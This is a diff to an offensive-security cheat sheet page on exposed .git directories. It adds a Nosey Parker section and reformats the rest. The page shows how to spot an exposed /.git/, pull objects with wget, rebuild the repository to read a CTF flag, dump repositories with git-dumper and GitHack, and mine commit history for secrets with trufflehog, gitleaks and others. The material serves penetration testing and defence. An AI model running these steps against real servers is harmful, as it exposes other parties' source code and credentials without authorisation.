External Variable Modification

Insecure Source Code Management/Git.md

@@ -14,12 +14,12 @@
         * [GitHack](#githack)
         * [GitTools](#gittools)
     * [Harvesting secrets](#harvesting-secrets)
+        * [noseyparker](#noseyparker)
         * [trufflehog](#trufflehog)
         * [Yar](#yar)
         * [Gitrob](#gitrob)
         * [Gitleaks](#gitleaks)
-* [Refererences]
-
+* [References](#references)
 
 ## Methodology
 
@@ -27,22 +27,24 @@ The following examples will create either a copy of the .git or a copy of the cu
 
 Check for the following files, if they exist you can extract the .git folder.
 
-- `.git/config`
-- `.git/HEAD`
-- `.git/logs/HEAD`
-
+* `.git/config`
+* `.git/HEAD`
+* `.git/logs/HEAD`
 
 ### Recovering file contents from .git/logs/HEAD
 
-1. Check for 403 Forbidden or directory listing to find the `/.git/` directory
-2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too)
+* Check for 403 Forbidden or directory listing to find the `/.git/` directory
+* Git saves all information in `.git/logs/HEAD` (try lowercase `head` too)
+
   ```powershell
   0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000        clone: from https://github.com/fermayo/hello-world-lamp.git
   15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000        commit: Initial.
   26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000        commit: Whoops! Remove flag.
   6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000        commit: Prevent directory listing.
   ```
-3. Access the commit using the hash
+
+* Access the commit using the hash
+
   ```powershell
   # create an empty .git repository
   git init test
@@ -63,20 +65,24 @@ Check for the following files, if they exist you can extract the .git folder.
       committer Michael <michael@easyctf.com> 1489390329 +0000
       Initial.
   ```
-4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
-  ```powershell
-  wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
-  mkdir .git/object/32
-  mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
 
-  git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
-      040000 tree bd083286051cd869ee6485a3046b9935fbd127c0        css
-      100644 blob cb6139863967a752f3402b3975e97a84d152fd8f        flag.txt
-      040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97        fonts
-      100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1        index.html
-      040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8        js
-  ```
-5. Read the data (flag.txt)
+* Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
+
+    ```powershell
+    wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
+    mkdir .git/object/32
+    mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
+
+    git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
+        040000 tree bd083286051cd869ee6485a3046b9935fbd127c0        css
+        100644 blob cb6139863967a752f3402b3975e97a84d152fd8f        flag.txt
+        040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97        fonts
+        100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1        index.html
+        040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8        js
+    ```
+
+* Read the data (flag.txt)
+
   ```powershell
   wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
   mkdir .git/object/cb
@@ -84,10 +90,9 @@ Check for the following files, if they exist you can extract the .git folder.
   git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
   ```
 
-
 ### Recovering file contents from .git/index
 
-Use the git index file parser https://pypi.python.org/pypi/gin (python3).
+Use the git index file parser <https://pypi.python.org/pypi/gin> (python3).
 
 ```powershell
 pip3 install gin
@@ -105,7 +110,6 @@ name = CRLF injection/README.md
 sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
 ```
 
-
 ## Tools
 
 ### Automatic recovery
@@ -113,6 +117,7 @@ sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
 #### git-dumper.py
 
 * [arthaud/git-dumper](https://github.com/arthaud/git-dumper)
+
 ```powershell
 pip install -r requirements.txt
 ./git-dumper.py http://web.site/.git ~/website
@@ -175,16 +180,27 @@ GitHack.py http://web.site/.git/
 git checkout -- .
 ```
 
-
 ### Harvesting secrets
 
+#### noseyparker
+
+> [praetorian-inc/noseyparker](https://github.com/praetorian-inc/noseyparker) - Nosey Parker is a command-line tool that finds secrets and sensitive information in textual data and Git history.
+
+```ps1
+git clone https://github.com/trufflesecurity/test_keys
+docker run -v "$PWD":/scan ghcr.io/praetorian-inc/noseyparker:latest scan --datastore datastore.np ./test_keys/
+docker run -v "$PWD":/scan ghcr.io/praetorian-inc/noseyparker:latest report --color always
+noseyparker scan --datastore np.noseyparker --git-url https://github.com/praetorian-inc/noseyparker
+noseyparker scan --datastore np.noseyparker --github-user octocat
+```
+
 #### trufflehog
 
 > Searches through git repositories for high entropy strings and secrets, digging deep into commit history.
 
 ```powershell
-pip install truffleHog # https://github.com/dxa4481/truffleHog
-truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
+pip install truffleHog
+truffleHog --regex --entropy=False https://github.com/trufflesecurity/trufflehog.git
 ```
 
 #### Yar
@@ -211,21 +227,23 @@ gitrob [options] target [target2] ... [targetN]
 > Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories.
 
 * Run gitleaks against a public repository
+
     ```powershell
     docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git
     ```
 
 * Run gitleaks against a local repository already cloned into /tmp/
+
     ```powershell
     docker run --rm --name=gitleaks -v /tmp/:/code/  zricethezav/gitleaks -v --repo-path=/code/gitleaks
     ```
 
 * Run gitleaks against a specific Github Pull request
+
     ```powershell
     docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000
     ```
 
-
 ## References
 
-- [Gitrob: Now in Go - Michael Henriksen - January 24, 2024](https://michenriksen.com/blog/gitrob-now-in-go/)
+* [Gitrob: Now in Go - Michael Henriksen - January 24, 2024](https://michenriksen.com/blog/gitrob-now-in-go/)